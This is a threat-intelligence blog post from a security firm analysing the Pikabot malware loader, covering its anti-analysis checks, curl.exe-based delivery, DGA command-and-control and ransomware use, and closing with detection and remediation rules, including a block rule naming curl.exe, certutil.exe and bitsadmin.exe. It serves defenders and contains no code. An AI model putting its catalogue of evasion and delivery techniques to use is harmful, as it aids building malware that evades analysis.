BIPI is a Chennai-based engineering company that operates the control layer for modern digital infrastructure. We design and run cybersecurity defence, agentic AI systems, digital engineering, growth automation, and continuous compliance as one platform, so organisations can detect signals, decide in real time, and deliver continuously.

What cybersecurity services does BIPI offer?

Web, mobile, network, and API penetration testing (VAPT), red team engagements, cloud security architecture, Zero Trust deployments, 24/7 SOC operations, and detection engineering. We work with financial services, SaaS, and regulated mid-market companies across India, APAC, EMEA, and North America.

What AI services does BIPI build?

Custom AI agents, LLM integrations, autonomous decision systems, and AI Ops intelligence layers. Our agents are scoped, observable, and audited end-to-end. We do not ship demos. We ship production agents that take real action across your existing systems.

Which compliance frameworks does BIPI support?

ISO 27001:2022, SOC 2 Type II, PCI DSS, GDPR, and India's DPDPA. We treat compliance as an engineering program, not a paper exercise: continuous evidence generation, exception tracking, and 72-hour breach-readiness.

BIPI Private Limited is headquartered in Chennai, Tamil Nadu, India, and serves clients across APAC, EMEA, and North America.

How do I contact BIPI?

Email info@bipi.in for new engagements or careers@bipi.in for jobs. You can also use the contact form at bipi.in/contact. We respond within one business day.

BIPI

Pikabot: The Loader That Filled Qakbot's Void

Threat Intelligence

Pikabot emerged weeks after Qakbot's August 2023 takedown with a two-component architecture and aggressive anti-analysis that signaled professional development. Ransomware affiliates adopted it within months.

By Arjun Raghavan, Security & Systems Lead, BIPI · September 15, 2024 · 10 min read

#pikabot#malware-loader#post-qakbot#ransomware#anti-analysis

When Operation Duck Hunt dismantled Qakbot in August 2023, it left a vacuum in the ransomware affiliate ecosystem. Qakbot had been the preferred initial access mechanism for several major ransomware groups, and its sudden absence created immediate demand for a replacement. Pikabot, first observed in early 2023 and expanding rapidly after the Qakbot takedown, positioned itself as exactly that replacement. Its technical architecture and the speed of its adoption both suggest it was not an opportunistic newcomer but a prepared successor.

Two-Component Architecture

Pikabot's distinguishing technical characteristic is its strict separation between a loader component and a core module. Most loaders bundle these functions together; Pikabot keeps them separate to the point where the loader and core communicate using a local named pipe and the core will refuse to run if it detects it has been launched directly rather than through the loader's pipe handshake. This design makes sandbox analysis significantly harder, because sandboxes that capture and re-execute the core module in isolation will simply see it exit immediately.

Loader component: responsible for anti-analysis checks, decrypting the core, injecting it into a host process
Core module: handles C2 communication, command processing, and payload staging
Handshake: loader passes a validation token to core via named pipe; core exits if token is absent or incorrect
Injection target: loader injects core into a suspended legitimate process (WerFault.exe or svchost.exe)

Anti-Analysis: Depth and Breadth

Pikabot implements one of the most comprehensive anti-analysis suites seen in a commodity loader. Researchers from Elastic Security and the DFIR Report documented over a dozen distinct evasion checks in early samples. The checks are not simply sequential; they use junk code and control-flow flattening to make static analysis expensive, and the actual evasion logic is dispersed throughout hundreds of functions rather than centralized in a single 'anti-debug' routine.

System language check: exits if GetUserDefaultLocaleName returns a language associated with CIS countries (Russian, Belarusian, Ukrainian, Kazakh, etc.)
Debugger detection: checks NtQueryInformationProcess for DebugPort, NtGlobalFlag, and heap flags
Hardware breakpoint detection via thread context inspection
Timing check: uses RDTSC instruction pairs to detect single-step debugging
Process enumeration: hashes running process names and checks against a list of analysis tool hashes
VM detection: queries WMI for Win32_ComputerSystem manufacturer field; exits on VMware, VirtualBox, QEMU strings
Minimum core count: exits if fewer than 4 logical processors are reported
Control-flow flattening: all functions are dispatched through a central switch statement, making CFG analysis useless

The CIS language exclusion is a standard feature in Russian-nexus malware, serving both as operational security (avoid infecting Russian speakers who might report to local authorities) and as a crude geofencing mechanism. Its presence in Pikabot is a meaningful attribution signal.

Delivery Mechanism

Pikabot delivery campaigns observed in late 2023 used thread-hijacked phishing emails, directly mirroring the Qakbot playbook. The attachment or link delivers a .zip file containing a malicious JavaScript file. The JavaScript, when executed by wscript.exe, downloads and executes the Pikabot loader DLL via curl.exe (a legitimate Windows system binary since Windows 10 1803). Using curl.exe rather than PowerShell's Invoke-WebRequest allows Pikabot to avoid PowerShell Script Block Logging entirely.

Early 2023

Pikabot first observed (pre-Qakbot takedown)

Weeks

Time to campaign surge after Qakbot takedown

12+

Distinct anti-analysis checks documented in loader

Minimum logical processor count before Pikabot runs

C2 Communication

Pikabot's core module communicates with its C2 infrastructure over HTTPS using TLS 1.3. The initial beacon encodes the victim's system fingerprint (hostname, username, OS version, hardware profile hash) in a JSON body encrypted with RSA before TLS encryption, providing an extra layer of confidentiality that persists even if TLS is intercepted. C2 domains are generated using a domain generation algorithm (DGA) seeded with the current date, meaning the active C2 address changes daily and blocklisting known domains has limited effectiveness beyond the current day.

Ransomware Affiliate Adoption

Black Basta: confirmed Pikabot usage in multiple intrusions documented by the DFIR Report (Q4 2023)
Ransomhouse: Pikabot observed as precursor in at least two confirmed intrusions
Post-access TTPs mirror Qakbot playbook: BloodHound enumeration, credential dumping, Cobalt Strike, then ransomware
Dwell time before ransomware: median 48-72 hours in observed incidents, shorter than Qakbot's historical median

Detection

Alert on curl.exe spawned by wscript.exe or cscript.exe with arguments pointing to external URLs
Process: WerFault.exe or svchost.exe with parent processes other than their legitimate parents
Named pipe: monitor for named pipe creation by NSIS or script host processes; Pikabot's loader-to-core pipe has a random name but consistent creation timing
Network: Pikabot DGA domains follow a pattern (random-seeming but consistent-length hostnames under .com and .net TLDs registered within the last 7 days)
YARA: Elastic Security published Pikabot YARA rules in October 2023 covering both the loader and core components
Memory: look for WerFault.exe with executable memory regions not associated with any loaded module

Remediation

Block outbound connections from curl.exe, certutil.exe, and bitsadmin.exe via host-based firewall GPO
Reassign .js file handler to notepad.exe to prevent wscript.exe execution of downloaded JavaScript files
Enable DNS query logging and alert on DGA-pattern domains (high-entropy, newly registered, under common TLDs)
Treat any WerFault.exe with anomalous parent process or network activity as a Pikabot indicator and isolate immediately
If Pikabot is confirmed, initiate a pre-ransomware IR response: assume lateral movement has begun and audit all Active Directory changes in the past 72 hours

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.